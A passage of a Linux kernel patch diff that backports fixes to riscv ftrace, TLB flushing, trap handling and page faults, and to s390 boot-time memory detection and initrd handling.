+-			hstart = (start + PMD_SIZE - 1) & PMD_MASK;
+-			hend = end & PMD_MASK;
+-			if (hstart < hend)
+-				hflush = true;
+-		}
++		hstart = (start + PMD_SIZE - 1) & PMD_MASK;
++		hend = end & PMD_MASK;
++		hflush = IS_ENABLED(CONFIG_TRANSPARENT_HUGEPAGE) && hstart < hend;
+ 
+ 		if (type == FLUSH_TYPE_LOCAL) {
+ 			asm volatile("ptesync": : :"memory");
+diff --git a/arch/riscv/Makefile b/arch/riscv/Makefile
+index c8187867c5f47..ba8050e63acfb 100644
+--- a/arch/riscv/Makefile
++++ b/arch/riscv/Makefile
+@@ -11,7 +11,11 @@ LDFLAGS_vmlinux :=
+ ifeq ($(CONFIG_DYNAMIC_FTRACE),y)
+ 	LDFLAGS_vmlinux := --no-relax
+ 	KBUILD_CPPFLAGS += -DCC_USING_PATCHABLE_FUNCTION_ENTRY
+-	CC_FLAGS_FTRACE := -fpatchable-function-entry=8
++ifeq ($(CONFIG_RISCV_ISA_C),y)
++	CC_FLAGS_FTRACE := -fpatchable-function-entry=4
++else
++	CC_FLAGS_FTRACE := -fpatchable-function-entry=2
++endif
+ endif
+ 
+ ifeq ($(CONFIG_CMODEL_MEDLOW),y)
+diff --git a/arch/riscv/include/asm/ftrace.h b/arch/riscv/include/asm/ftrace.h
+index 04dad33800418..9e73922e1e2e5 100644
+--- a/arch/riscv/include/asm/ftrace.h
++++ b/arch/riscv/include/asm/ftrace.h
+@@ -42,6 +42,14 @@ struct dyn_arch_ftrace {
+  * 2) jalr: setting low-12 offset to ra, jump to ra, and set ra to
+  *          return address (original pc + 4)
+  *
++ *<ftrace enable>:
++ * 0: auipc  t0/ra, 0x?
++ * 4: jalr   t0/ra, ?(t0/ra)
++ *
++ *<ftrace disable>:
++ * 0: nop
++ * 4: nop
++ *
+  * Dynamic ftrace generates probes to call sites, so we must deal with
+  * both auipc and jalr at the same time.
+  */
+@@ -52,25 +60,43 @@ struct dyn_arch_ftrace {
+ #define AUIPC_OFFSET_MASK	(0xfffff000)
+ #define AUIPC_PAD		(0x00001000)
+ #define JALR_SHIFT		20
+-#define JALR_BASIC		(0x000080e7)
+-#define AUIPC_BASIC		(0x00000097)
++#define JALR_RA			(0x000080e7)
++#define AUIPC_RA		(0x00000097)
++#define JALR_T0			(0x000282e7)
++#define AUIPC_T0		(0x00000297)
+ #define NOP4			(0x00000013)
+ 
+-#define make_call(caller, callee, call)					\
++#define to_jalr_t0(offset)						\
++	(((offset & JALR_OFFSET_MASK) << JALR_SHIFT) | JALR_T0)
++
++#define to_auipc_t0(offset)						\
++	((offset & JALR_SIGN_MASK) ?					\
++	(((offset & AUIPC_OFFSET_MASK) + AUIPC_PAD) | AUIPC_T0) :	\
++	((offset & AUIPC_OFFSET_MASK) | AUIPC_T0))
++
++#define make_call_t0(caller, callee, call)				\
+ do {									\
+-	call[0] = to_auipc_insn((unsigned int)((unsigned long)callee -	\
+-				(unsigned long)caller));		\
+-	call[1] = to_jalr_insn((unsigned int)((unsigned long)callee -	\
+-			       (unsigned long)caller));			\
++	unsigned int offset =						\
++		(unsigned long) callee - (unsigned long) caller;	\
++	call[0] = to_auipc_t0(offset);					\
++	call[1] = to_jalr_t0(offset);					\
+ } while (0)
+ 
+-#define to_jalr_insn(offset)						\
+-	(((offset & JALR_OFFSET_MASK) << JALR_SHIFT) | JALR_BASIC)
++#define to_jalr_ra(offset)						\
++	(((offset & JALR_OFFSET_MASK) << JALR_SHIFT) | JALR_RA)
+ 
+-#define to_auipc_insn(offset)						\
++#define to_auipc_ra(offset)						\
+ 	((offset & JALR_SIGN_MASK) ?					\
+-	(((offset & AUIPC_OFFSET_MASK) + AUIPC_PAD) | AUIPC_BASIC) :	\
+-	((offset & AUIPC_OFFSET_MASK) | AUIPC_BASIC))
++	(((offset & AUIPC_OFFSET_MASK) + AUIPC_PAD) | AUIPC_RA) :	\
++	((offset & AUIPC_OFFSET_MASK) | AUIPC_RA))
++
++#define make_call_ra(caller, callee, call)				\
++do {									\
++	unsigned int offset =						\
++		(unsigned long) callee - (unsigned long) caller;	\
++	call[0] = to_auipc_ra(offset);					\
++	call[1] = to_jalr_ra(offset);					\
++} while (0)
+ 
+ /*
+  * Let auipc+jalr be the basic *mcount unit*, so we make it 8 bytes here.
+diff --git a/arch/riscv/include/asm/jump_label.h b/arch/riscv/include/asm/jump_label.h
+index 6d58bbb5da467..14a5ea8d8ef0f 100644
+--- a/arch/riscv/include/asm/jump_label.h
++++ b/arch/riscv/include/asm/jump_label.h
+@@ -18,6 +18,7 @@ static __always_inline bool arch_static_branch(struct static_key * const key,
+ 					       const bool branch)
+ {
+ 	asm_volatile_goto(
++		"	.align		2			\n\t"
+ 		"	.option push				\n\t"
+ 		"	.option norelax				\n\t"
+ 		"	.option norvc				\n\t"
+@@ -39,6 +40,7 @@ static __always_inline bool arch_static_branch_jump(struct static_key * const ke
+ 						    const bool branch)
+ {
+ 	asm_volatile_goto(
++		"	.align		2			\n\t"
+ 		"	.option push				\n\t"
+ 		"	.option norelax				\n\t"
+ 		"	.option norvc				\n\t"
+diff --git a/arch/riscv/include/asm/pgtable.h b/arch/riscv/include/asm/pgtable.h
+index ec6fb83349ced..92ec2d9d7273f 100644
+--- a/arch/riscv/include/asm/pgtable.h
++++ b/arch/riscv/include/asm/pgtable.h
+@@ -415,7 +415,7 @@ static inline void update_mmu_cache(struct vm_area_struct *vma,
+ 	 * Relying on flush_tlb_fix_spurious_fault would suffice, but
+ 	 * the extra traps reduce performance.  So, eagerly SFENCE.VMA.
+ 	 */
+-	flush_tlb_page(vma, address);
++	local_flush_tlb_page(address);
+ }
+ 
+ static inline void update_mmu_cache_pmd(struct vm_area_struct *vma,
+diff --git a/arch/riscv/include/asm/thread_info.h b/arch/riscv/include/asm/thread_info.h
+index 67322f878e0d7..f704c8dd57e04 100644
+--- a/arch/riscv/include/asm/thread_info.h
++++ b/arch/riscv/include/asm/thread_info.h
+@@ -43,6 +43,7 @@
+ #ifndef __ASSEMBLY__
+ 
+ extern long shadow_stack[SHADOW_OVERFLOW_STACK_SIZE / sizeof(long)];
++extern unsigned long spin_shadow_stack;
+ 
+ #include <asm/processor.h>
+ #include <asm/csr.h>
+diff --git a/arch/riscv/kernel/ftrace.c b/arch/riscv/kernel/ftrace.c
+index 2086f65857737..5bff37af4770b 100644
+--- a/arch/riscv/kernel/ftrace.c
++++ b/arch/riscv/kernel/ftrace.c
+@@ -55,12 +55,15 @@ static int ftrace_check_current_call(unsigned long hook_pos,
+ }
+ 
+ static int __ftrace_modify_call(unsigned long hook_pos, unsigned long target,
+-				bool enable)
++				bool enable, bool ra)
+ {
+ 	unsigned int call[2];
+ 	unsigned int nops[2] = {NOP4, NOP4};
+ 
+-	make_call(hook_pos, target, call);
++	if (ra)
++		make_call_ra(hook_pos, target, call);
++	else
++		make_call_t0(hook_pos, target, call);
+ 
+ 	/* Replace the auipc-jalr pair at once. Return -EPERM on write error. */
+ 	if (patch_text_nosync
+@@ -70,42 +73,13 @@ static int __ftrace_modify_call(unsigned long hook_pos, unsigned long target,
+ 	return 0;
+ }
+ 
+-/*
+- * Put 5 instructions with 16 bytes at the front of function within
+- * patchable function entry nops' area.
+- *
+- * 0: REG_S  ra, -SZREG(sp)
+- * 1: auipc  ra, 0x?
+- * 2: jalr   -?(ra)
+- * 3: REG_L  ra, -SZREG(sp)
+- *
+- * So the opcodes is:
+- * 0: 0xfe113c23 (sd)/0xfe112e23 (sw)
+- * 1: 0x???????? -> auipc
+- * 2: 0x???????? -> jalr
+- * 3: 0xff813083 (ld)/0xffc12083 (lw)
+- */
+-#if __riscv_xlen == 64
+-#define INSN0	0xfe113c23
+-#define INSN3	0xff813083
+-#elif __riscv_xlen == 32
+-#define INSN0	0xfe112e23
+-#define INSN3	0xffc12083
+-#endif
+-
+-#define FUNC_ENTRY_SIZE	16
+-#define FUNC_ENTRY_JMP	4
+-
+ int ftrace_make_call(struct dyn_ftrace *rec, unsigned long addr)
+ {
+-	unsigned int call[4] = {INSN0, 0, 0, INSN3};
+-	unsigned long target = addr;
+-	unsigned long caller = rec->ip + FUNC_ENTRY_JMP;
++	unsigned int call[2];
+ 
+-	call[1] = to_auipc_insn((unsigned int)(target - caller));
+-	call[2] = to_jalr_insn((unsigned int)(target - caller));
++	make_call_t0(rec->ip, addr, call);
+ 
+-	if (patch_text_nosync((void *)rec->ip, call, FUNC_ENTRY_SIZE))
++	if (patch_text_nosync((void *)rec->ip, call, MCOUNT_INSN_SIZE))
+ 		return -EPERM;
+ 
+ 	return 0;
+@@ -114,15 +88,14 @@ int ftrace_make_call(struct dyn_ftrace *rec, unsigned long addr)
+ int ftrace_make_nop(struct module *mod, struct dyn_ftrace *rec,
+ 		    unsigned long addr)
+ {
+-	unsigned int nops[4] = {NOP4, NOP4, NOP4, NOP4};
++	unsigned int nops[2] = {NOP4, NOP4};
+ 
+-	if (patch_text_nosync((void *)rec->ip, nops, FUNC_ENTRY_SIZE))
++	if (patch_text_nosync((void *)rec->ip, nops, MCOUNT_INSN_SIZE))
+ 		return -EPERM;
+ 
+ 	return 0;
+ }
+ 
+-
+ /*
+  * This is called early on, and isn't wrapped by
+  * ftrace_arch_code_modify_{prepare,post_process}() and therefor doesn't hold
+@@ -144,10 +117,10 @@ int ftrace_init_nop(struct module *mod, struct dyn_ftrace *rec)
+ int ftrace_update_ftrace_func(ftrace_func_t func)
+ {
+ 	int ret = __ftrace_modify_call((unsigned long)&ftrace_call,
+-				       (unsigned long)func, true);
++				       (unsigned long)func, true, true);
+ 	if (!ret) {
+ 		ret = __ftrace_modify_call((unsigned long)&ftrace_regs_call,
+-					   (unsigned long)func, true);
++					   (unsigned long)func, true, true);
+ 	}
+ 
+ 	return ret;
+@@ -159,16 +132,16 @@ int ftrace_modify_call(struct dyn_ftrace *rec, unsigned long old_addr,
+ 		       unsigned long addr)
+ {
+ 	unsigned int call[2];
+-	unsigned long caller = rec->ip + FUNC_ENTRY_JMP;
++	unsigned long caller = rec->ip;
+ 	int ret;
+ 
+-	make_call(caller, old_addr, call);
++	make_call_t0(caller, old_addr, call);
+ 	ret = ftrace_check_current_call(caller, call);
+ 
+ 	if (ret)
+ 		return ret;
+ 
+-	return __ftrace_modify_call(caller, addr, true);
++	return __ftrace_modify_call(caller, addr, true, false);
+ }
+ #endif
+ 
+@@ -203,12 +176,12 @@ int ftrace_enable_ftrace_graph_caller(void)
+ 	int ret;
+ 
+ 	ret = __ftrace_modify_call((unsigned long)&ftrace_graph_call,
+-				    (unsigned long)&prepare_ftrace_return, true);
++				    (unsigned long)&prepare_ftrace_return, true, true);
+ 	if (ret)
+ 		return ret;
+ 
+ 	return __ftrace_modify_call((unsigned long)&ftrace_graph_regs_call,
+-				    (unsigned long)&prepare_ftrace_return, true);
++				    (unsigned long)&prepare_ftrace_return, true, true);
+ }
+ 
+ int ftrace_disable_ftrace_graph_caller(void)
+@@ -216,12 +189,12 @@ int ftrace_disable_ftrace_graph_caller(void)
+ 	int ret;
+ 
+ 	ret = __ftrace_modify_call((unsigned long)&ftrace_graph_call,
+-				    (unsigned long)&prepare_ftrace_return, false);
++				    (unsigned long)&prepare_ftrace_return, false, true);
+ 	if (ret)
+ 		return ret;
+ 
+ 	return __ftrace_modify_call((unsigned long)&ftrace_graph_regs_call,
+-				    (unsigned long)&prepare_ftrace_return, false);
++				    (unsigned long)&prepare_ftrace_return, false, true);
+ }
+ #endif /* CONFIG_DYNAMIC_FTRACE */
+ #endif /* CONFIG_FUNCTION_GRAPH_TRACER */
+diff --git a/arch/riscv/kernel/mcount-dyn.S b/arch/riscv/kernel/mcount-dyn.S
+index d171eca623b6f..125de818d1bab 100644
+--- a/arch/riscv/kernel/mcount-dyn.S
++++ b/arch/riscv/kernel/mcount-dyn.S
+@@ -13,8 +13,8 @@
+ 
+ 	.text
+ 
+-#define FENTRY_RA_OFFSET	12
+-#define ABI_SIZE_ON_STACK	72
++#define FENTRY_RA_OFFSET	8
++#define ABI_SIZE_ON_STACK	80
+ #define ABI_A0			0
+ #define ABI_A1			8
+ #define ABI_A2			16
+@@ -23,10 +23,10 @@
+ #define ABI_A5			40
+ #define ABI_A6			48
+ #define ABI_A7			56
+-#define ABI_RA			64
++#define ABI_T0			64
++#define ABI_RA			72
+ 
+ 	.macro SAVE_ABI
+-	addi	sp, sp, -SZREG
+ 	addi	sp, sp, -ABI_SIZE_ON_STACK
+ 
+ 	REG_S	a0, ABI_A0(sp)
+@@ -37,6 +37,7 @@
+ 	REG_S	a5, ABI_A5(sp)
+ 	REG_S	a6, ABI_A6(sp)
+ 	REG_S	a7, ABI_A7(sp)
++	REG_S	t0, ABI_T0(sp)
+ 	REG_S	ra, ABI_RA(sp)
+ 	.endm
+ 
+@@ -49,24 +50,18 @@
+ 	REG_L	a5, ABI_A5(sp)
+ 	REG_L	a6, ABI_A6(sp)
+ 	REG_L	a7, ABI_A7(sp)
++	REG_L	t0, ABI_T0(sp)
+ 	REG_L	ra, ABI_RA(sp)
+ 
+ 	addi	sp, sp, ABI_SIZE_ON_STACK
+-	addi	sp, sp, SZREG
+ 	.endm
+ 
+ #ifdef CONFIG_DYNAMIC_FTRACE_WITH_REGS
+ 	.macro SAVE_ALL
+-	addi	sp, sp, -SZREG
+ 	addi	sp, sp, -PT_SIZE_ON_STACK
+ 
+-	REG_S x1,  PT_EPC(sp)
+-	addi	sp, sp, PT_SIZE_ON_STACK
+-	REG_L x1,  (sp)
+-	addi	sp, sp, -PT_SIZE_ON_STACK
++	REG_S t0,  PT_EPC(sp)
+ 	REG_S x1,  PT_RA(sp)
+-	REG_L x1,  PT_EPC(sp)
+-
+ 	REG_S x2,  PT_SP(sp)
+ 	REG_S x3,  PT_GP(sp)
+ 	REG_S x4,  PT_TP(sp)
+@@ -100,15 +95,11 @@
+ 	.endm
+ 
+ 	.macro RESTORE_ALL
++	REG_L t0,  PT_EPC(sp)
+ 	REG_L x1,  PT_RA(sp)
+-	addi	sp, sp, PT_SIZE_ON_STACK
+-	REG_S x1,  (sp)
+-	addi	sp, sp, -PT_SIZE_ON_STACK
+-	REG_L x1,  PT_EPC(sp)
+ 	REG_L x2,  PT_SP(sp)
+ 	REG_L x3,  PT_GP(sp)
+ 	REG_L x4,  PT_TP(sp)
+-	REG_L x5,  PT_T0(sp)
+ 	REG_L x6,  PT_T1(sp)
+ 	REG_L x7,  PT_T2(sp)
+ 	REG_L x8,  PT_S0(sp)
+@@ -137,17 +128,16 @@
+ 	REG_L x31, PT_T6(sp)
+ 
+ 	addi	sp, sp, PT_SIZE_ON_STACK
+-	addi	sp, sp, SZREG
+ 	.endm
+ #endif /* CONFIG_DYNAMIC_FTRACE_WITH_REGS */
+ 
+ ENTRY(ftrace_caller)
+ 	SAVE_ABI
+ 
+-	addi	a0, ra, -FENTRY_RA_OFFSET
++	addi	a0, t0, -FENTRY_RA_OFFSET
+ 	la	a1, function_trace_op
+ 	REG_L	a2, 0(a1)
+-	REG_L	a1, ABI_SIZE_ON_STACK(sp)
++	mv	a1, ra
+ 	mv	a3, sp
+ 
+ ftrace_call:
+@@ -155,8 +145,8 @@ ftrace_call:
+ 	call	ftrace_stub
+ 
+ #ifdef CONFIG_FUNCTION_GRAPH_TRACER
+-	addi	a0, sp, ABI_SIZE_ON_STACK
+-	REG_L	a1, ABI_RA(sp)
++	addi	a0, sp, ABI_RA
++	REG_L	a1, ABI_T0(sp)
+ 	addi	a1, a1, -FENTRY_RA_OFFSET
+ #ifdef HAVE_FUNCTION_GRAPH_FP_TEST
+ 	mv	a2, s0
+@@ -166,17 +156,17 @@ ftrace_graph_call:
+ 	call	ftrace_stub
+ #endif
+ 	RESTORE_ABI
+-	ret
++	jr t0
+ ENDPROC(ftrace_caller)
+ 
+ #ifdef CONFIG_DYNAMIC_FTRACE_WITH_REGS
+ ENTRY(ftrace_regs_caller)
+ 	SAVE_ALL
+ 
+-	addi	a0, ra, -FENTRY_RA_OFFSET
++	addi	a0, t0, -FENTRY_RA_OFFSET
+ 	la	a1, function_trace_op
+ 	REG_L	a2, 0(a1)
+-	REG_L	a1, PT_SIZE_ON_STACK(sp)
++	mv	a1, ra
+ 	mv	a3, sp
+ 
+ ftrace_regs_call:
+@@ -196,6 +186,6 @@ ftrace_graph_regs_call:
+ #endif
+ 
+ 	RESTORE_ALL
+-	ret
++	jr t0
+ ENDPROC(ftrace_regs_caller)
+ #endif /* CONFIG_DYNAMIC_FTRACE_WITH_REGS */
+diff --git a/arch/riscv/kernel/time.c b/arch/riscv/kernel/time.c
+index 8217b0f67c6cb..1cf21db4fcc77 100644
+--- a/arch/riscv/kernel/time.c
++++ b/arch/riscv/kernel/time.c
+@@ -5,6 +5,7 @@
+  */
+ 
+ #include <linux/of_clk.h>
++#include <linux/clockchips.h>
+ #include <linux/clocksource.h>
+ #include <linux/delay.h>
+ #include <asm/sbi.h>
+@@ -29,6 +30,8 @@ void __init time_init(void)
+ 
+ 	of_clk_init(NULL);
+ 	timer_probe();
++
++	tick_setup_hrtimer_broadcast();
+ }
+ 
+ void clocksource_arch_init(struct clocksource *cs)
+diff --git a/arch/riscv/kernel/traps.c b/arch/riscv/kernel/traps.c
+index f77cb8e42bd2a..5d07f6b3ca327 100644
+--- a/arch/riscv/kernel/traps.c
++++ b/arch/riscv/kernel/traps.c
+@@ -34,10 +34,11 @@ void die(struct pt_regs *regs, const char *str)
+ 	static int die_counter;
+ 	int ret;
+ 	long cause;
++	unsigned long flags;
+ 
+ 	oops_enter();
+ 
+-	spin_lock_irq(&die_lock);
++	spin_lock_irqsave(&die_lock, flags);
+ 	console_verbose();
+ 	bust_spinlocks(1);
+ 
+@@ -54,7 +55,7 @@ void die(struct pt_regs *regs, const char *str)
+ 
+ 	bust_spinlocks(0);
+ 	add_taint(TAINT_DIE, LOCKDEP_NOW_UNRELIABLE);
+-	spin_unlock_irq(&die_lock);
++	spin_unlock_irqrestore(&die_lock, flags);
+ 	oops_exit();
+ 
+ 	if (in_interrupt())
+diff --git a/arch/riscv/mm/fault.c b/arch/riscv/mm/fault.c
+index d86f7cebd4a7e..eb0774d9c03b1 100644
+--- a/arch/riscv/mm/fault.c
++++ b/arch/riscv/mm/fault.c
+@@ -267,10 +267,12 @@ asmlinkage void do_page_fault(struct pt_regs *regs)
+ 	if (user_mode(regs))
+ 		flags |= FAULT_FLAG_USER;
+ 
+-	if (!user_mode(regs) && addr < TASK_SIZE &&
+-			unlikely(!(regs->status & SR_SUM)))
+-		die_kernel_fault("access to user memory without uaccess routines",
+-				addr, regs);
++	if (!user_mode(regs) && addr < TASK_SIZE && unlikely(!(regs->status & SR_SUM))) {
++		if (fixup_exception(regs))
++			return;
++
++		die_kernel_fault("access to user memory without uaccess routines", addr, regs);
++	}
+ 
+ 	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, addr);
+ 
+diff --git a/arch/s390/boot/boot.h b/arch/s390/boot/boot.h
+index 70418389414d3..939a1b7806df2 100644
+--- a/arch/s390/boot/boot.h
++++ b/arch/s390/boot/boot.h
+@@ -8,10 +8,26 @@
+ 
+ #ifndef __ASSEMBLY__
+ 
++struct vmlinux_info {
++	unsigned long default_lma;
++	void (*entry)(void);
++	unsigned long image_size;	/* does not include .bss */
++	unsigned long bss_size;		/* uncompressed image .bss size */
++	unsigned long bootdata_off;
++	unsigned long bootdata_size;
++	unsigned long bootdata_preserved_off;
++	unsigned long bootdata_preserved_size;
++	unsigned long dynsym_start;
++	unsigned long rela_dyn_start;
++	unsigned long rela_dyn_end;
++	unsigned long amode31_size;
++};
++
+ void startup_kernel(void);
+-unsigned long detect_memory(void);
++unsigned long detect_memory(unsigned long *safe_addr);
+ bool is_ipl_block_dump(void);
+ void store_ipl_parmblock(void);
++unsigned long read_ipl_report(unsigned long safe_addr);
+ void setup_boot_command_line(void);
+ void parse_boot_command_line(void);
+ void verify_facilities(void);
+@@ -20,6 +36,7 @@ void sclp_early_setup_buffer(void);
+ void print_pgm_check_info(void);
+ unsigned long get_random_base(unsigned long safe_addr);
+ void __printf(1, 2) decompressor_printk(const char *fmt, ...);
++void error(char *m);
+ 
+ /* Symbols defined by linker scripts */
+ extern const char kernel_version[];
+@@ -31,8 +48,11 @@ extern char __boot_data_start[], __boot_data_end[];
+ extern char __boot_data_preserved_start[], __boot_data_preserved_end[];
+ extern char _decompressor_syms_start[], _decompressor_syms_end[];
+ extern char _stack_start[], _stack_end[];
+-
+-unsigned long read_ipl_report(unsigned long safe_offset);
++extern char _end[];
++extern unsigned char _compressed_start[];
++extern unsigned char _compressed_end[];
++extern struct vmlinux_info _vmlinux_info;
++#define vmlinux _vmlinux_info
+ 
+ #endif /* __ASSEMBLY__ */
+ #endif /* BOOT_BOOT_H */
+diff --git a/arch/s390/boot/decompressor.c b/arch/s390/boot/decompressor.c
+index 623f6775d01d7..aad6f31fbd3d9 100644
+--- a/arch/s390/boot/decompressor.c
++++ b/arch/s390/boot/decompressor.c
+@@ -11,6 +11,7 @@
+ #include <linux/string.h>
+ #include <asm/page.h>
+ #include "decompressor.h"
++#include "boot.h"
+ 
+ /*
+  * gzip declarations
+diff --git a/arch/s390/boot/decompressor.h b/arch/s390/boot/decompressor.h
+index f75cc31a77dd9..92b81d2ea35d6 100644
+--- a/arch/s390/boot/decompressor.h
++++ b/arch/s390/boot/decompressor.h
+@@ -2,37 +2,11 @@
+ #ifndef BOOT_COMPRESSED_DECOMPRESSOR_H
+ #define BOOT_COMPRESSED_DECOMPRESSOR_H
+ 
+-#include <linux/stddef.h>
+-
+ #ifdef CONFIG_KERNEL_UNCOMPRESSED
+ static inline void *decompress_kernel(void) { return NULL; }
+ #else
+ void *decompress_kernel(void);
+ #endif
+ unsigned long mem_safe_offset(void);
+-void error(char *m);
+-
+-struct vmlinux_info {
+-	unsigned long default_lma;
+-	void (*entry)(void);
+-	unsigned long image_size;	/* does not include .bss */
+-	unsigned long bss_size;		/* uncompressed image .bss size */
+-	unsigned long bootdata_off;
+-	unsigned long bootdata_size;
+-	unsigned long bootdata_preserved_off;
+-	unsigned long bootdata_preserved_size;
+-	unsigned long dynsym_start;
+-	unsigned long rela_dyn_start;
+-	unsigned long rela_dyn_end;
+-	unsigned long amode31_size;
+-};
+-
+-/* Symbols defined by linker scripts */
+-extern char _end[];
+-extern unsigned char _compressed_start[];
+-extern unsigned char _compressed_end[];
+-extern char _vmlinux_info[];
+-
+-#define vmlinux (*(struct vmlinux_info *)_vmlinux_info)
+ 
+ #endif /* BOOT_COMPRESSED_DECOMPRESSOR_H */
+diff --git a/arch/s390/boot/kaslr.c b/arch/s390/boot/kaslr.c
+index e8d74d4f62aa5..58a8d8c8a1007 100644
+--- a/arch/s390/boot/kaslr.c
++++ b/arch/s390/boot/kaslr.c
+@@ -174,7 +174,6 @@ unsigned long get_random_base(unsigned long safe_addr)
+ {
+ 	unsigned long memory_limit = get_mem_detect_end();
+ 	unsigned long base_pos, max_pos, kernel_size;
+-	unsigned long kasan_needs;
+ 	int i;
+ 
+ 	memory_limit = min(memory_limit, ident_map_size);
+@@ -186,12 +185,7 @@ unsigned long get_random_base(unsigned long safe_addr)
+ 	 */
+ 	memory_limit -= kasan_estimate_memory_needs(memory_limit);
+ 
+-	if (IS_ENABLED(CONFIG_BLK_DEV_INITRD) && initrd_data.start && initrd_data.size) {
+-		if (safe_addr < initrd_data.start + initrd_data.size)
+-			safe_addr = initrd_data.start + initrd_data.size;
+-	}
+ 	safe_addr = ALIGN(safe_addr, THREAD_SIZE);
+-
+ 	kernel_size = vmlinux.image_size + vmlinux.bss_size;
+ 	if (safe_addr + kernel_size > memory_limit)
+ 		return 0;
+diff --git a/arch/s390/boot/mem_detect.c b/arch/s390/boot/mem_detect.c
+index 7fa1a32ea0f3f..daa1593171835 100644
+--- a/arch/s390/boot/mem_detect.c
++++ b/arch/s390/boot/mem_detect.c
+@@ -16,29 +16,10 @@ struct mem_detect_info __bootdata(mem_detect);
+ #define ENTRIES_EXTENDED_MAX						       \
+ 	(256 * (1020 / 2) * sizeof(struct mem_detect_block))
+ 
+-/*
+- * To avoid corrupting old kernel memory during dump, find lowest memory
+- * chunk possible either right after the kernel end (decompressed kernel) or
+- * after initrd (if it is present and there is no hole between the kernel end
+- * and initrd)
+- */
+-static void *mem_detect_alloc_extended(void)
+-{
+-	unsigned long offset = ALIGN(mem_safe_offset(), sizeof(u64));
+-
+-	if (IS_ENABLED(CONFIG_BLK_DEV_INITRD) && initrd_data.start && initrd_data.size &&
+-	    initrd_data.start < offset + ENTRIES_EXTENDED_MAX)
+-		offset = ALIGN(initrd_data.start + initrd_data.size, sizeof(u64));
+-
+-	return (void *)offset;
+-}
+-
+ static struct mem_detect_block *__get_mem_detect_block_ptr(u32 n)
+ {
+ 	if (n < MEM_INLINED_ENTRIES)
+ 		return &mem_detect.entries[n];
+-	if (unlikely(!mem_detect.entries_extended))
+-		mem_detect.entries_extended = mem_detect_alloc_extended();
+ 	return &mem_detect.entries_extended[n - MEM_INLINED_ENTRIES];
+ }
+ 
+@@ -147,7 +128,7 @@ static int tprot(unsigned long addr)
+ 	return rc;
+ }
+ 
+-static void search_mem_end(void)
++static unsigned long search_mem_end(void)
+ {
+ 	unsigned long range = 1 << (MAX_PHYSMEM_BITS - 20); /* in 1MB blocks */
+ 	unsigned long offset = 0;
+@@ -159,33 +140,34 @@ static void search_mem_end(void)
+ 		if (!tprot(pivot << 20))
+ 			offset = pivot;
+ 	}
+-
+-	add_mem_detect_block(0, (offset + 1) << 20);
++	return (offset + 1) << 20;
+ }
+ 
+-unsigned long detect_memory(void)
++unsigned long detect_memory(unsigned long *safe_addr)
+ {
+-	unsigned long max_physmem_end;
++	unsigned long max_physmem_end = 0;
+ 
+ 	sclp_early_get_memsize(&max_physmem_end);
++	mem_detect.entries_extended = (struct mem_detect_block *)ALIGN(*safe_addr, sizeof(u64));
+ 
+ 	if (!sclp_early_read_storage_info()) {
+ 		mem_detect.info_source = MEM_DETECT_SCLP_STOR_INFO;
+-		return max_physmem_end;
+-	}
+-
+-	if (!diag260()) {
++	} else if (!diag260()) {
+ 		mem_detect.info_source = MEM_DETECT_DIAG260;
+-		return max_physmem_end;
+-	}
+-
+-	if (max_physmem_end) {
++		max_physmem_end = max_physmem_end ?: get_mem_detect_end();
++	} else if (max_physmem_end) {
+ 		add_mem_detect_block(0, max_physmem_end);
+ 		mem_detect.info_source = MEM_DETECT_SCLP_READ_INFO;
+-		return max_physmem_end;
++	} else {
++		max_physmem_end = search_mem_end();
++		add_mem_detect_block(0, max_physmem_end);
++		mem_detect.info_source = MEM_DETECT_BIN_SEARCH;
++	}
++
++	if (mem_detect.count > MEM_INLINED_ENTRIES) {
++		*safe_addr += (mem_detect.count - MEM_INLINED_ENTRIES) *
++			     sizeof(struct mem_detect_block);
+ 	}
+ 
+-	search_mem_end();
+-	mem_detect.info_source = MEM_DETECT_BIN_SEARCH;
+-	return get_mem_detect_end();
++	return max_physmem_end;
+ }
+diff --git a/arch/s390/boot/startup.c b/arch/s390/boot/startup.c
+index 47ca3264c0230..e0863d28759a5 100644
+--- a/arch/s390/boot/startup.c
++++ b/arch/s390/boot/startup.c
+@@ -57,16 +57,17 @@ unsigned long mem_safe_offset(void)
+ }
+ #endif
+ 
+-static void rescue_initrd(unsigned long addr)
++static unsigned long rescue_initrd(unsigned long safe_addr)
+ {
+ 	if (!IS_ENABLED(CONFIG_BLK_DEV_INITRD))
+-		return;
++		return safe_addr;
+ 	if (!initrd_data.start || !initrd_data.size)
+-		return;
+-	if (addr <= initrd_data.start)
+-		return;
+-	memmove((void *)addr, (void *)initrd_data.start, initrd_data.size);
+-	initrd_data.start = addr;
++		return safe_addr;
++	if (initrd_data.start < safe_addr) {
++		memmove((void *)safe_addr, (void *)initrd_data.start, initrd_data.size);
++		initrd_data.start = safe_addr;
++	}
++	return initrd_data.start + initrd_data.size;
+ }
+ 
+ static void copy_bootdata(void)
+@@ -250,6 +251,7 @@ static unsigned long reserve_amode31(unsigned long safe_addr)
+ 
+ void startup_kernel(void)
+ {
++	unsigned long max_physmem_end;
+ 	unsigned long random_lma;
+ 	unsigned long safe_addr;
+ 	void *img;
+@@ -265,12 +267,13 @@ void startup_kernel(void)
+ 	safe_addr = reserve_amode31(safe_addr);
+ 	safe_addr = read_ipl_report(safe_addr);
+ 	uv_query_info();
+-	rescue_initrd(safe_addr);
++	safe_addr = rescue_initrd(safe_addr);
+ 	sclp_early_read_info();
+ 	setup_boot_command_line();
+ 	parse_boot_command_line();
+ 	sanitize_prot_virt_host();
+-	setup_ident_map_size(detect_memory());
++	max_physmem_end = detect_memory(&safe_addr);
++	setup_ident_map_size(max_physmem_end);
+ 	setup_vmalloc_size();
+ 	setup_kernel_memory_layout();
+ 
+diff --git a/arch/s390/include/asm/ap.h b/arch/s390/include/asm/ap.h
+index f508f5025e388..57a2d6518d272 100644
+--- a/arch/s390/include/asm/ap.h
++++ b/arch/s390/include/asm/ap.h
+@@ -239,7 +239,10 @@ static inline struct ap_queue_status ap_aqic(ap_qid_t qid,
+ 	union {
+ 		unsigned long value;
+ 		struct ap_qirq_ctrl qirqctrl;
+-		struct ap_queue_status status;
++		struct {
++			u32 _pad;
++			struct ap_queue_status status;
++		};
+ 	} reg1;
+ 	unsigned long reg2 = pa_ind;
+ 
+@@ -253,7 +256,7 @@ static inline struct ap_queue_status ap_aqic(ap_qid_t qid,
+ 		"	lgr	%[reg1],1\n"		/* gr1 (status) into reg1 */
+ 		: [reg1] "+&d" (reg1)
+ 		: [reg0] "d" (reg0), [reg2] "d" (reg2)
+-		: "cc", "0", "1", "2");
++		: "cc", "memory", "0", "1", "2");
+ 
+ 	return reg1.status;
+ }
